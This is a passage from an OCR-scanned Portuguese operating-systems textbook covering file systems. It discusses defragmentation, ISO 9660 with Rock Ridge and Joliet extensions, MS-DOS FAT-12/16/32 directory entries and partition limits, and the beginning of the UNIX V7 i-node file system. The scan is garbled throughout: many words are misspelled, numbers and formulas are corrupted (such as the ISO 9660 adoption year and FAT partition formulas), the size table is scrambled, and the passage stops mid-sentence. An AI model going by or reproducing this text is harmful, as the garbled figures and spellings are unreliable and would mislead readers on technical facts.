um bloco contfguo de espaęo perto do imcio da partięao para 
o qual o arquivo original ou outros arquivos podem ser co- 
piados comigua menie. O processo pode, en ta o, ser repetido 
com a próxiiiia parte do disco, e assim sucessivamente. 

Alguns arquivos nao podem ser movidos, como o ar- 
quivo de paginaęao, o arquivo de hibernaęao c o log de jour- 
naUng, ja quc a administraęao necessśria para tal movimcn- 
taęao traria niais problemas do que beneffcios. Em alguns 
sistemas, essas sao areas contfguas de la manii o fixo e, por- 
tanto, nao devem ser deslragmentadas, A unica situaęno na 
qual a falta de mobilidade desses arquivos e um problcma e 
ąuando des estao localizados perto do Imał da partięao atjo 
tamanho o usuario deseja reduzir. Ha somente unia maneira 
tle resolver esse probleina, que e exclihr Lodos os arquivos 
juntos, redimensionar a partięao e recria-los depois disso. 

Os sistemas de arquivos do Linux (em especial o ext2 c 
o cxl3) costuinamsofrerinenos desfragmcntaęao do quc os 
do Windows, por conta da forma como os blocos do disco 
sao seledonados. Difirilmeme sera necessario realizar uma 
desf ragm e n ta ęa o ma n u a 1. 

m Exemplos de sistemas de 
_ arquivos _ 

Nas próximas seęoes, discutiremos varios exemplos de 
sistemas de arquivos, desde aąueles muito simples ate os 
aItamente sofisticados, Como os sistemas de arquivos mo- 
dcmos do UNIX c o sistema dc arquivos nativo do Windows 
Vista sao cobcrlos no capftulo sobrc o UN1X (Capftulo 10) 


e no capftulo sobre o Windows Vista (Capftulo 11}, nao os 
abordaremos aqui. Contudo, estudaremos sens predecesso- 
res nas seęoes a seguir. 

4-5-11 Sistemas de arąuivos para CD-ROM 

Como nosso primeiro excmplo dc urn sistema dc ar- 
quivos, consideremos os sistemas de arquivos usados em 
CD-ROMs. Esscs sistemas sao particularmente simples, 
pois sao projetados para meios de escrita uniea (write-on- 
ce). Entre o u tras colsas, por exemplo, des nao leni pro- 
visao para monitorar os blocos livres porque em um CD- 
-ROM os arquivos nao podem ser liberados ou adicionados 
depois de o disco ter sido fabricado. A seguir, estudaremos 
o principal tipo dc sistema de arquivos para CD-ROMs e 
duas mensoes delc. 

Alguns anos depois do surgimento do CD-ROjM, foi iiv 
troduzido o CD-R {CD Recordahle — CD gravavel) que, ao 
contrario do CD-ROM, permitia a inclusao de arquivos, 
ao finał do CD-R, depois da primeira gravaęao. Os arqui- 
vos mmca sao removtdos (embora seja possiyei auializar o 
diretório de forma a eseonder arquivos existemes). Como 
consequeucia desse tipo de arquivo "soinenle adirionar", 
as propriedades lundameniais nao softem alleraęao. Em 
particular, todo o espaęo livre esid locaiizado em uma unica 
parte contfgua no finał do CD, 

O sistema de arquivos ISO 9660 

O pa dra o mais cotnum enirc os sistemas dc arquivos 
para CD-ROMs foi a dotąd o como um Padrao Intemacional 
cm 1^88 sob o nonie ISO 9660. Praticamente todo CD- 
-ROM no mercado atual e compatfvel com esse padrao — 
algumas vczes com suas extensoes, que serao discutidas 
mais alem, nesta seęao, Um dos objctivos desse padrao era 
tornar possivel a todo CD-ROM ser lido por lodos os com- 
putadores, independentemente da ordem em que os bytes 
sao armazenados e do sistema operacional que estiver sen- 
do usado. Como conscąucncia, algumas limitaęoes foram 
aplicadas ao sistema de arquivos para possibilitar que siste¬ 
mas operacionais mais fracos (como o MS-DOS), ate entao 
em oso, pudessem le-los. 

Os CD-ROMs nao tern eilindros concentricos como os 
discos magneticos. Em vez disso, lia uma unica espiral con- 
ifmia que contem bits em uma seąuencia lincar (embora 
seja possfvel buscar transversa!mente as espirais). Os bits ao 
longo da espiral sao divididos em blocos lógkos (lambem 
ebamados dc setores lógkos) de 2352 bytes, Alguns desses 
bytes sao para preambulos, para correęao de en o ou ou tros 
destinos, A poręao lfquida (payload) de cada bloco lógico e de 
2,048 bytes. Quando usado para muska, os CDsapresentam 
intervalos iniciais, finais e entre as trilhas, mas eles nao sao 
usados para CD-ROMs de dados. Muitas vezcs a posięao de 
urn bloco ao longo da espiral e represemada em minutos e 
seguridos. Ela pode ser converiida em um mi mero lincar de 
bloco usaodo o fator de conversao de I s = 75 blocos. 
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O ISO 9660 cła suporte a conjuntos de CD-ROMs com 
ale 2 16 - 1 CDs. Os CD-ROMs individuais tambem podem 
serpartidonados em ralumes lógicos (partiędes). Contudo, 
a seguir, nos concenrraremos no ISO 9660 para um unito 
CD-ROM nao partirionado. 

To do CD-ROM comeęa tom 16 blocos cujas funęoes 
nao sao definidas pelo padrao ISO 9660. Um fabricante de 
CD-ROMs poderia usar essa area para oferecer um progra¬ 
nia de inicializaęao que permitisse que o compulador seja 
inicializado pelo CD-ROM, ou para algum outro propósito. 
Dcpois vem um bioto com o descritor de vofume pri- 
mario, que contem algumas mformaęócs gerais sobre o 
CD-ROM. Entrc cssas informaęocs cslao o idcntificador do 
sistcma (32 bytes), o idcntificador dc Yolume (32 bytes), 
o idcntificador do cdi tor (128 bytes) e o idcntificador do 
preparador dos dados (128 bytes). O fabricante pode pre- 
encher esses campos da maneira que quiscr, mas podera 
usar someme leiras maiiisculas, dtgitos e um nu mero mui- 
to pequeno de caracteres de pontuaęao para assegurar a 
compatibilidade em varias plataformas. 

O dcscritor dc volumc prima rio contem ainda nomes 
de Ues arquivos, que podem ter, respectivamentc, um resu- 
mo, urna notificaęao sobre direitos a ul ora is e informaęoes 
bibliografieas. Alem disso, e posswel haver te nos mim eros 
essentiais, induindo os tamanhos de blocos lógicos (nor- 
malmente 2.048, mas sao permitidos, para certos casos, 
4.096, 8.192 e valores maiores de potencias de dois), o mi- 
mero de blocos no CD-ROM e as datas de criaęao e de vali- 
dade do CD-ROM. Por firn, o dcscritor dc volumc primario 
traz tambem urna cntrada dc diretório para o diretório-rai z, 
indicando ondc cncontra-lo no CD-ROM (isto e, cm qual 
bloco dc comcęa). A partir desse diretório, o restante do 
sistcma de arquivos pode ser localizado. 

AJem do dcscritor de volume primario, um CD-ROM 
pode conter urn dcscritor de volume suplementar Esse 
dcscritor possui informaęoes similares ao dcscritor prima¬ 
rio, mas que nao nos interes sam aquL 

O di retorto-rai z e todos os outros diretórios sao forma- 
dos por um mimero variavel de entradas. A ultima delas 
contem um bit marcando-a como a entrada finał. As pró- 
prias entradas de diretório tambem tern tamanho variavel. 
Gada entrada de diretório e constituida de dez a 12 campos, 
alguns dos quais em ASCII e outros que sao campos nu- 
mcricos binarios, Os campos binarios sao codificados dnas 
vezes, urna com os bits menos significativos nos primd- 


ros bytes, ou seja, Httk-endkn (usados nos Pentiums, por 
exemplo), e outra com os bits mais significativos nos pri- 
mdros bytes, ou seja, big-endimi (usados nas SPARCS, por 
exemplo). Portanto, um mimero de 16 bits usa 4 bytes e 
um mimero dc 32 bits usa 8 bytes. 

Essa codificaęao redundante era necessaria para evitar 
ferir os sentimentos alheios quando o padrao foi desen- 
volvido. Sc o padrao tivcssc estabcleddo o forma to littk- 
-aidian as pessoas das empresas com produtos hkymdum 
se sentiriam como cidadaos de segunda classe e nao teriam 
aceitado o padrao. O conteudo emorional de um CD-ROM 
pode, portanto, ser medido e ąuantificado com exatidao 
cm quiiobytcs/hora de cspaęo desperdięado. 

O formato dc unia entrada dc diretório ISO 9660 e ilus- 
trado na Figura 4,27. Como as entradas dc diretório teru ta¬ 
manhos variaveis, o primeiro campo e um byle que indica 
o tamanho da entrada. Esse byle e definido com o bil dc or¬ 
dom mais aha a esąucrda para eYilarąualąuerambiguidade. 

As entradas de diretório podem, opdonalmente, ter 
atributos estendidos, Sc essa propriedade for usada para 
urna entrada dc diretórios, o scgimdo by te ind i cara o tama¬ 
nho dos atributos estendidos. 

Dcpois vem o bloco inictal do próprio arquivo. Os ar- 
quivos sao amiazenados como sequencias comtguas dc 
blocos; portanio, a localizaęao de um arquivo e compte- 
tamenie espcdficada pelo bloco inicia) e pelo tamanho, o 
qual e coniido no próxiino campo, 

A data e o boran o em quc o CD-ROM foi gra v ad o sao 
amiazenados no campo seguime, com bytes separados para 
ano, mćs, dia, hora, minuto, scgimdo e zona do fuso ho¬ 
ra rio. Os a nos comeęam a contar a panir dc 1900, o que 
significa que os CD-ROMs enfrcmarao problemas no ano 
2156, pois o ano seguintc □ 2155 sera 1900. Essc contra- 
tempo poderia ser postergado definindo-se a origem dos 
tempos como 1988 (o ano em que o padrao foi adoiado). 
Se tsso itvesse ocorrido, o problema seria adiado para 2244. 
Um tempo adicional de 88 a nos aj u da bastante. 

O campo Fla$sc ontem alguns bits, induindo um para 
ocultar a entrada nas listagens (um atributo copiado do 
MS-DOS), um para distinguir uma entrada que e um ar- 
quivo de uma entrada que e um diretório, um para capa- 
citar o uso dos atributos estendidos e um para marcar a 
ultima entrada de um diretório. Alguns outros bits tambem 
estao presentes nesse campo, mas des nao nos interessam 
aquu O próximo campo trata da intcrcalaęao de partes dc 
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arqtiivos de uma nianeira que nao e usada na versao mais 
simples do ISO 9660 e r portanto, nao a consideraremos. 

O próximo campo scrve para indicar em qual CD-ROM 
um arqirivo esta localizado. E pennitido que uma entrada 
de direlorio em nm CD-ROM rcfira-se a um arqiuvo lo¬ 
calizado em outro CD-ROM no dispositivo. Desse modo, 
torna-se possi‘vel construir um diretório-mestre no primei- 
ro CD-ROM que apresente todos os arquivos quc estcjam 
em todos os CD-ROMs de todo um conjunto, 

O campo indicado por Ł na Figura 4.27 mostra o ta- 
manho do nome do arquivo em bytes, Ele e s egu i do pdo 
próprio nome do arquivo. Um nome de arquivo consisie 
cm um nome-basc, um porno, uma extensao, um ponto c 
yirgula e um mi mero binario dc vcrsao (1 ou 2 byt es). O 
nome-base e a extensao podem usar letras maiuseulas, os 
dfgitosde 0 a 9 e o caractere de sublinłiado. Todos os outros 
caracteres sao proibidos para asscgurar que os dcmais com- 
putadores possani Udar com todos os nomes de arquivo. 
O nome-base pode ter ate oito caracteres; a extensao, ate 
tres. Essas escolhas foram ditadas pela necessidade de tor- 
nar o padrao compaiwel com o MS-DOS, Urn nome de ar- 
quivo pode estar preseme cni um diretório varias vezes, 
desde que cada um ten ha um numero de versao diferente. 

Os ultimos dois campos nem sempre estao presentes. 0 
campo Preenchimento € u sad o para foręar que toda entrada 
de diretório seja um niimero par de bytes para alinbar os 
campos numericos das enlradas subseąuentes em limites 
de 2 bytes. Se o preenchimemo se faz necessario, um byte 0 
e usado. Por fim, temos o campo Uso do sisiema. Sua funęao 
e seu tamanho sao indefinidos, exceto que ele deve conter 
um numero par dc bytes. Diferentes sistemas usam-no de 
diferentes manciras. O Macintosh, por exemplo, mantem 
nele os flags do Finder. 

As entradas de um diretório sao relacionadas em or¬ 
deru alfabćtica, escelo as duas primdras entradas. A pri- 
meira entrada e para o próprio diretório. A segunda e para 
seu pat. A esse respeiio, essas enlradas sao similares as en- 
tradas de diretório . e do UNIK. Os arquivos nao precisam 
estar em ordem dentro do diretório. 

Nao ha iinilte explfdto para o numero de entradas em um 
diretório, Com u do, ha um linii te para a profmididade de ani- 
ohamemo. a ma x ima profundidade de aninhamento dc um 
diretório e oito, Esse limite foi definido de forma arbitraria 
com eistas a tornar algumas aplicaęoes mais simples. 

O ISO 9660 define o que se chamou de tres nfveis. 
O nwel 1 e o mais restritivo e especifica que os nomes de 
arquivos estao limitados a S + 3 caracteres, conforme des- 
crito, e tambem requerque todos os arquivos sejam contf- 
guos. Alem disso, ele especifica que os nomes de di retor i os 
sejam limitados a oito caracteres sem exiensoes. O uso des¬ 
se ntvel maximiza as possibilidades dc ler u ni CD-ROM cm 
qualquer computador, 

O mvd 2 rclaxa a rcsfrięao do tamanho. Ele permitc 
quc arquivos e diretórios tenham nomes com ale 31 caracte¬ 
res, mas ainda do mesmo conjunto de caracteres. 


O mvel 3 emprega o mesmo limite do nfvel 2 para no¬ 
mes, mas rdaxa parcialmente a snposięao de que os arqui- 
vos tern de ser contfguos. Nessc mVel um arquivo pode ser 
forma do por varias seęóes, cada uma como uma sequencia 
comigua de blocos. A inesma sequencia pode ocorrer varias 
vezcs em um arquivo e tambem em dois ou mais arquivos, 
Se grandes poręoes de dados estiverem repetidas em varios 
arquivos, o nfvd 3 oferccera alguma olimUaęao do espaęo 
por nao cxigir que os dados estcjam presentes varias vczcs, 

Extens6es Rock Ridge 

Como vimos, o ISO 9660 e alLamente resiriiivo em va- 
rios sentidos. Logo depois de seu advento r as pessoas da co- 
munidade UNIX comeęaram a trabalhar cm uma extensao 
para possibilitar a represemaęao de sistemas de arquivos 
UNIX em CD-ROMs. Essas extensoes foram diamadas de 
Rock Rid$e r em homenagem a pequena cidade do filme Ban- 
zino Oeste, com Gcne Wilder, provavclmemc pocque um 
dos membros do comite gostava daqude filme. 

As extcnsóes u sam o campo Uso do sisiema para possi- 
bilitar a leilura dos CD-ROMs Rock Ridge c m qualquer com- 
putador. Todos os de mais campos mantem seus slgnificados 
usuais para o ISO 9660. Qualquer sisiema quc nao conhcęa 
as extens5es Rock Ridge apenas as ignora e percehe o CD- 
ROM como normal. 

As extensoes sao divididas entre os seguintes campos: 

1. PX — Atributos P0SIX 

2. PN — Numerosde dispositivoprincipaleseamdario, 

3. SL — Ligaęao simbólica. 

4. NM — Nome aIternalivo. 

5. CL ■— Localizaęao do fil ho. 

ó. PL — Localizaęao do pai. 

7, RE — Realocaęao. 

S. TF — Estampa de tempo (timestamp). 

O campo PX contem o padrao UN1X para bits dc per- 
missao rwxrwxrwx para o proprietario, o grupo e outros, 
Ele tambem contem os outros bits contidos na palavra de 
modo, como os bits SETU1D e SETG1D, e assim por dianie. 

O campo PN existe para permitir que dispositivos pos¬ 
sani ser representados em um CD-ROM. Ele contem os nu- 
meros de dispositivos principais e secundarios assodados 
ao arquivo. Desse modo, o contetido do diretório fdev pode 
ser escriio no CD-ROM e depois reconstrufdo corretamente 
no sistema de destino. 

0 campo SL serve para ligaęoes simbólicas (ou links sim- 
bólicos). Ele permite que o arquivo de um sistema de arqui- 
vos reHra-sc ao arquivo de urn sistema dc arquivos dilercntc. 

Provavelmente o campo mais importante seja o NM, 
Ele permite quc um segtmdo nome seja associado ao ar- 
quivo. Esse nome esta sujcito as rcstrięóes sobrc tamanho 
e conjunto de caracteres impostas pdo ISO 9660 , possibi- 
litando exprcssar nomes arbitrarios de arqnivos UN1X em 
um CD-ROM. 
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Os tres campos seguinies sao usados em conjunto para 
evitar o liinite de oito diretórios que padem ser aninhados 
no ISO 9660. E posswel usa-los para especificar que um 
diretório deve ser realocado e para indicar ondc de vai na 
bierarąuia, Na vcrdade, cssa ć urna maneira artifirial dc 
ton toni ar o limite dc profil ndidade* 

Por Hm, o campo TE contem as tres estampas de tempa 
(timestamp) indufdas em cada i-node do UNiX, a saben o 
insiame da criaęao do arquivo, o jostanie em que de foi 
modificado pda ultima veze o imtantc em que ocorreu a 
ultimo acesso, Juntas, cssas cxtcnsoes tornam possivcl a 
topią de um sistcma dc arquivos UNIX para um CD-ROM c 
su a reslauraęao corrcla em um sistcma cfifercnte. 

Extensoes Joliet 

A comimidade UNIX nao era o unico grupo que queria 
um modo de estender o ISO 9660. A Microsoft tambem o 
via como muito resuitivo (embora tenha sido o MS-DOS 
da Microsoft o ca u s a do r da maioria das restrięócs), Con- 
tudo r a Microsoft invcmou algumas cxtcns6es que foram 
chamadas dc Joliet, projetadas para pemiilu que o sistcma 
dc arqinvos do Windows fossc copiado para o CD-ROM c 
entao restaurado — predsaineme da mesma maneira que 
o Rock Ridije foi projetado para o UNiX. Praticamenie, to- 
dos os programas que cxecutam sob o Windows e usam 
CD-ROMs suportam o Joliet, indusive os programas que 
gravarn em CDs regravaveis. Hm geral, esses programas 
okrecem urna escolha entre os varios imeis do ISO 9660 
c o Joliet. As piincipais exlcnsoes oferecidas pelo Joliet sao 

1. Nomcs dc arquivos longos. 

2. Conjunto de caracteres Unicode. 

3. Aninhamento de diretórios mais profundo que oilo 
nfveis. 

4. Nomcs de diretórios com extensóes. 

A primeira ex ten sao pen ni te no mes de arquivoś com 
ale 64 caracteres. A segunda possibiiita o uso do conjumo 
de caracteres Unicode para nomes de arquivo$. Essa ex- 
tensao e importantc para que o software possa ser empre- 
gado em patses que nao adotern o alfabetu latino, como 
Japao, Israel e Grćcia. Como os caracteres Unicode ocupam 
2 bytes, o nome maximo de um arquivo no Joliet ocupa 
128 byt es. 

Assim como no Rock Ridge, a limitaęao sobre aninha- 
nientos de diretórios foi removida no Joliet, Os diretórios 
podem ser aninhados em quantos niveis de profundidade 
forem necessarios. Por firn, os nomes de diretório podem 
ter extensoes. Nao se sabe ao certo por que a extensao foi 
indufda, pois os diretórios do Windows virtual menie nu li¬ 
ca usani extensoes, mas ialvez um dia os useni. 

4.5.21 o sistema de arquivos do MS-DOS 

O sistcma dc arquivos do MS-DOS foi o primeiro a ser 
utilizado nos primeiros compmadores pessoais da IBM e 


foi o prindpal sistema de arquivos do Windows 98 e do 
Windows ME. O Windows 2000, o XP e o Vista dao supor- 
te a esse sistema, mas ele nao e mais o padrao nos novos 
PCs, exceto para discos flexfveis. Entretamo, ele e urna de 
suas cxtcnsócs (FAT-32) tornaram-se largamente utiiizados 
cm muitos sistemas cmbarcados, A maior parte das dhne- 
ras digitais utiliza o FAT-32, assim como muitos dos MP3 
players. O popular i Pod, da Apple, tern o sistcma como pa¬ 
drao, embora hackers habiiidosos consigam reformata-lo 
para uiilizaęao em outro sistema de arquivos. O nnmero 
de dispositivos eletronicos usando a sistema de arquivos do 
MS-DOS e, portanto, maior atualmente do que em qual- 
quer outra epoca e cert a nieme maior do que o niimero de 
dispositivos usando o moderno sistema de arqinvos NTFS. 
Assim sen do, vale a pena examinar o sistema. 

Para ler um arquivo, um programa MS-DOS deve pri¬ 
meiro fazer urna ehamada de sistema open para obter seu 
descritor. A cli a ma da de sistema open e spęd Fica um caminho 
ate o diretório de trabalho, que pode ser absolulo ou relati- 
vo. O caminho e procurado, componente por componente, 
ate que o diretório finał seja locaiizado e carregado na ine- 
mória. Ele e entao buscado para o arquivo a ser aberto. 

Embora os diretórios do MS-DOS sejarn de tamanho va- 
riavel, eles usam urna entrada de diretório de tamanho Fxo 
de 32 byies. O forma to de urna entrada de diretório MS- 
DOS e mostrado na Figura 4.28. Ele contem o nome do 
arquivQ, os atributos e a data de criaęao, bloco inicial e o 
tamanho exato do arquivo. Os nomes menores que 8 + 
3 caracteres sao ajustados a esquerda c preenchidos com 
cspaęos a dircita, separadamentc em cada campo. O ca nipo 
Atributos c novo c contem bits para indicar se um arquivo c 
somcnlc para leitura, se prerisa ser feita cópia dc seguran- 
ęa, se e oculto ou se e um arquivo de sistema* Arquivos so- 
mente para leilura nao podem ser escritos* Isso serve para 
protege-los de um dano acidental. O bit cópia de segimmęa 
nao tem funęao para o sistema operacionai {isto e, o MS- 
DOS nem verifica nemaltera esse bit). A intenęao e deixar 
para os programas que fazem cópias de seguranęa em nfvel 
de usuario desligarem-no qnando efetuarem o backup de 
um arquivo e que os outros programas o liguem quando 
modificarem um arquivo. Desse modo, um programa de 
cópias dc seguranęa pode consultar o bit desse atributo para 
cada arquivo c verificar ąuais arqutvos dcvcm ser copiados* 
O bit oculto pode ser ligado para impedir quc um aiquivo 
apareęa em listagens de diretórios* Sua principa! aplicaęao 
e cvitar que usttarios inexperientes fiquem confusos com 
arquivos que eles nao conseguem eniender. Por firn, o bit 
mierna tambem oculta arquivos. Aleni disso, os arquivos de 
sistema nao podem ser acidemalmente removidos usando- 
-se o comando dei Os principais componentes do MS-DOS 
mantem esse bit ligado. 

A entrada dc diretório tambem contem a data c a hora 
em que o arquivo foi criado ou modificado pela ultima vez. 
A precisao do tempo e somenie de mais ou menos 2 s, pois 
e armazenado em um campo de 2 bytes que pode, por sua 
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Bytes 



EKtensSo Atribulos 


( Figura 4,28 A entrada de diretório do MS-DOS, 

vez, armazenar apenas 65.536 lalores (um dia eoniem 
86.400 segundos). O campo Tempo e subdividfdo cm segun- 
dos (5 bits), minutos (6 bUs) e horas (5 bits). A data conia 
os dias usando tres subcampos: dia (5 bits), mes (4 biis) 
e a no — 1980 (6 biis). Goni um nu mero dc 7 bits para o 
ano conlando a partir de 1980, o maior valor que pode ser 
represemado e 2107, Portanlo, o MS-DOS tera um proble- 
ma no ano 2108, Para evitar essa ca las trok, os usuarios de 
MS-DOS devem comeęar a reda mar do problcma do ano 
2108 o mais rapido possweL Sc o MS-DOS tivesse usado os 
campos Data e Hor ario combi na dos como um comador de 
32 biis, de teńa represeniado cada segnndo correiamenie 
e atrasado a catastrofe ate 2116. 

O MS-DOS armazena o lamanlio do arquivo como um 
numero de 32 bits e, cm teoria, osarquivos podem ter ate 
4 GB* Comudo, outros limiies (descrilos a seguir) restrin- 
gem o tamanho maximo de um arquivo para 2 OB ou mc- 
nos. Surpreendememcnie, lima grandę parte das emradas 
dc diretório (10 bytes) nao ć usada. 

O MS-DOS monitora os blocos do arquivo por unia 
tabela de alocaęao de arqmvos na memória principał* A en- 
trada de diretório eon te m o nu mero do primeiro bloco do 
arquivo. Esse numero e usado como um ihdice ern uma 
FAT de 64 K entradas na memória principał. Seguindo o 
encadeamento, to dos os blocos podem ser en contra dos, A 
operaęao da FAT e ilustrada na Figura 4.10. 

O sistema dearquivos FATexiste em tres versoespara o 
MS-DOS: FAT-1 2, FAT-16 e FAT-32, dependendo de quan- 
tos bits ocupe inn endereęo de disco. Na yerdade, FAT-32 
nao e um nome adequado, pois somente os 28 biis menos 
significati tos dos endereęos de disco sao tisados. Deveria 
se chamar FAT-2S, mas as potencias de dois soam melhor. 

Para lodas as FATs, o bloco de disco pode ser defmido 
como algum multiplo de 512 bytes (provave lnie nie dife- 
rente para cada partięao), com o conjunto de tamanhos de 
bloco permitidos (chamados de eluster sizes pela Micro¬ 
soft) diferemes para cada variante. A primeira versao do 
MS-DOS ysava a FAT-12 com blocos de 512 bytes, propi- 
ciando um lamanlio maximo de partięao de 2 ]2 x 512 bytes 
(na verdade somente 4,0Só x 512 bytes, pois dez dos en¬ 
dereęos de disco foram usados como marcadores esperiais, 
como fim de arquivo, bloco defdtuoso ctc.). Com esses pa- 
rametros, o tamanho maxuno de partięao em disco era ccrca 
dc 2 MB e o tamanho da tabela FAT na memória era 4,096 
emradas de 2 bytes cada* Usar uma entrada tle tabela de 12 biis 
causaria muiia lentidao. 


Reservado Tempo Data 

Numero do 
primeiro blooo 


Esse sistema fundonou bem para discos flexiveis, mas 
ąuando vieram os discos ngidos fol um problcma. A Micro¬ 
soft resolveu isso permitindo tamanhos de blocos adidonais 
de 1 KB, 2 KB e 4 KB. Essa alleraęao preservou a estru tura 
e o tamanho da tabela FAT-12, mas permiiiu a cxistenda dc 
partięóes ale de 16 MB, 

Como o MS-DOS suportava quatro partięóes por disco r 
o novo sistema de arquivos FAT-12 trabalbava com discos 
de ate 64 MB. Alem desse valor, algo teria dc ser feito. O 
que a eon tece u foi a introduęao da FAT-16, com ponteiros 
de disco de 16 bits. Alem disso, foram permitidos tamanhos dc 
blocos dc 8 KB, 16 KB c 32 KB (32.768 ć a maior potencia 
de dois que poderia ser represemada com 16 bits). A ta¬ 
bela FAT-16 ocupava agora 128 KB de memória principał 
o tempo lodo, mas, com a disponibilidade das memórias 
maiores, da foi ampla menie empregada c rapidamente 
substittiiu o sistema de arquivos FAT-12. A maior partjęao 
dc disco suportada por uma FAT-16 e 2 GB (64 K emradas de 
32 KB cada) e o maior disco ć de 8 GB, ocupando quairo 
partięóes de 2 GB cada. 

Quando se trata de aplicaęoes ccmerciais, esse linii- 
te nao e urn problcma, mas, para annazenar vfdeo digilal 
usando padrao 13 V, urn arquivo de 2 GB pode conter ape¬ 
nas nove minutos de vtdeo. Como conseąuencia do fato de 
um disco do PC ser capaz de dar supone a apenas quatro 
partięóes, o maior vfdco que pode ser armazenado cm um 
disco tern duraęao dc cerca de 3S minutos, nao importando 
o tamanho do disco. Esse li mile tambem signilka que o 
maior video passivcl dc ser editado on-linc e menor do que 
19 minutos, pois ambos os arquivos de entrada e satda sao 
nccessarios. 

A partir da scgtmda versao do Windows 95, foi smrodu- 
zido o sistema de arquivos FAT-32, com seus endereęos de 
disco dc 28 bits, c a versao do MS-DOS que scrvin de basc 
para o Windows 95 foi adaptada para dar dar supone a FAT- 
-32, Nesse sistema, as partięóes poderiam, teoricamente, 
conter 2- s x 2 H bytes, mas elas sao, na verdade, limitadas a 
2 TB (2,048 GB), pois interna menie o sistema monitora os 
tamanhos das partięóes em setores de 512 bytes, usando um 
numero de 32 bits, e 2 ł> x 2^corresponde a 2 TB. O tama¬ 
nho maximo de partięao para os varios tamanhos de blocos e 
para todos os tipos de FAT e mostrado na Tabela 4.4, 

Alem de dar su porte aos discos maiores, o sistema 
de arquivos FAT-32 apresenta duas outras vantagcns so- 
bre o FAT-16, Primeiro, um disco de S GB usando FAT-32 
pode ocupar uma unica partięao. Usando FAT-16, e preciso 
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Tamanho do bloco 

FAT-12 

FAT-16 

FAT-32 

0.5 KB 

2 MB 



1 KB 

4 MB 



2 KB 

8 MB 

128 MB 


4 KB 

16 MB 

256 MB 

1 TB 

8 KB 


512 MB 

2 TB 

16 KB 


1024 MB 

2 TB 

32 KB 


2048 MB 

2 TB 


I Ta bela 4 A Tamanho rnaximo da partięao para diferentes 
tam an boa de bloco. As cdlulas em brance nepresantam 
combinaęóes nao penmitidas. 

haver quatro partięoes, que parecem, para o usuario do 
Windows, como as imidades lógicas de disco C:, D:, E: e 
F:> Cabc ao usuario decidir qual arquivo coloear cm qual 
unidade e monitorar o que esta onde. 

A outra vantagcm do FAT-32 com rdaęao ao FAT-16 
e que, para um dado ta manii o dc partięao de disco, pode 
ser usado um tamanho nicnor dc bloco, Por cxemplo, para 
unia partięao dc disco de 2 GB, o FAT-16 dcvc usar blo- 
cos dc 32 KB; de outro modo, com a pen as 64 K endereęos 
disponfvcis, o FAT-16 nao conseguc cobiir a partięao loda. 
For outro lado, o FAT-32 pode usar, por exemp!o, blocos 
de 4 KB para urna partięao de disco dc 2 GB. A yantagem 
dc ter um tamanho menor dc bloco c quc a maioria dos 
arquivos c hem menor que 32 KB. Sc o tamanho do blo¬ 
co for 32 KB, um arquivo dc 10 bytes o cup a ta 32 KB dc 
cspaęo cm disco. Se o tamanho mćdlo for, por exemplo, 
8 KB, entao, com um bloco de 32 KB, 3/4 do disco serao 
dcsperdięados, o quc nao ć um metodo realnienie di cienie 
dc usar o disco. Com um arquivo de S KB e um bloco de 4 
KB, nao ha desperdicio de disco, mas o preęo pago e mais 
RAM devorada pcla FAT. Com um bloco de 4 KB c unia par- 
lięao dc disco de 2 GB ha 512 K blocos; portamo, a FAT deve 
ter 512 E< entradas na memória {oatpando 2 MB de RAM). 

O MS-DOS usa a FAT para monitorar os blocos de disco 
livres. Qualquer bloco que nao esteja atualmente alocado e 
marcado com um código esperial. Quando o MS-DOS pre- 
cisa dc um novo bloco de disco, cle busca a FAT para u ma 
entrada contendo esse código, Assirrt, mapa de bits ou lista 
de livres nao sc fazem necessarios, 

4.531 O sistema de arquivos do UNIX V7 

Mesmo as primeiras versóes do UNJX tinham um siste¬ 
ma dc arquivos multiusuario bastamc sofistlcado, ja que cle 
c derivado do MIJLTICS. A seguir, diseutiremos o sistema 
dc arquivos V7 — aquek do PDP-11 c que tornou o UNIX 
famoso. Estudaremos urna versao moderna de um sistema 
dc arquivos UNIX no contexio do Liruix no Captuilo 10. 

O sistema de arquivos existe na forma de uma a ryc¬ 
ie imdalizando-se no diretório-raiz, com a adięao dc liga- 


ędes, formando um grafo orieiitado ariclico. Os nonies de 
arquivos tern ate 14 caracteres e podem conter qualquer 
caractere ASCII exceto / (porque esse e o separador entre 
os componentes de um caminho) e NUL (usado para pre- 
eneher os cspaęos quc sobram nos nonies com menos dc 14 
caractcrcs). NUL tern o valor numcrico 0. 

Uma entrada de direiório UNJX comem uma entra¬ 
da para ca da arqtiivo naquele direiório. Cada uma delas e 
extremamente simples porque o UNIX usa o esquema de 
i-node ilustrado na Figura 4.11. Uma entrada de diretó- 
rio comem somente dois campos; o nonie do arquivo (14 
bytes) c o nu mero do i-nodc para aquele arquivo (2 bytes), 
conforme mostra a Figura 4,29. Esses parametros limitam 
o nurnero dc arquivos pot sistema dc arquivos cm 64 K. 

Assim como o i-node da Figura 4.11, os i-nodes UNIX 
comem alguns atributos. Estes contem o tamanho do ar- 
quivo, tres momentos (criaęao, ultimo accsso e ultima al- 
teraęao), proprie tarło, grupo, in form a ca o dc proteęao e um 
comador do nu mero dc entradas dc diretório quc apontam 
para o i-nodc. Esse ultimo ca nipo c iicccssario para as liga- 
ęoes* Sc uma nova ligaęao for fcita para um i-nodc, o con- 
tador no i-nodc sera merementado. Quando uma ligaęao e 
rcmovida, o comador e decrememado. Quando chega a 0, 
o i-node e reivindicado e os blocos de disco sao colocados 
de vo!ta na lista de livres. 

Para trata r. arquivos niuito grandes, e kita uma moni- 
toraęao dos blocos de disco usando uma generalizaęlo da 
Figura 4.11, Os primeiros dez endereęos dc disco sao ar- 
mazenados no próprio i-node; assim, para pequenos arqui- 
vos, todas as informaęóes necessarias estao diretameme no 
i-node, que e buseado do disco para a memória prineipal 
quando o arquivo e aberto. Para alguns arquivos maiores, 
um dos endereęos no i-node e o endereęo de um bloco de 
disco cha mado bloco ind ir et o simples. Esse bloco comem 
endereęos de disco adtcionais. Se isso ainda nao for sufi- 
ciente, outro endereęo no i-node, chamado bloco indire- 
to duplo, contem os endereęos dc um bloco quc comem 
uma lista dc blocos indiretos simples. Cada um desses blocos 
indiretos simples aponta para algumas ccntenas dc blocos de 
dados, Se ate mesmo isso nao for suficientc, podc-sc cm- 
pręgar o bloco indireto triplo. O quadro completo esta 
ilustrado na Figura 4.30. 

Quando um arquivo e aberto, o sistema dcve, uma 
vez fomccido o nonie do arquivo, localizar sens blocos dc 
disco, Considcremos o modo como o nome do caminho 
hisr/ast/mhoK e localizado. Usaremos o UNIX como exemplo, 

Bytes 2 14 

Nome do arquivo 

V — 

Nu mero do 
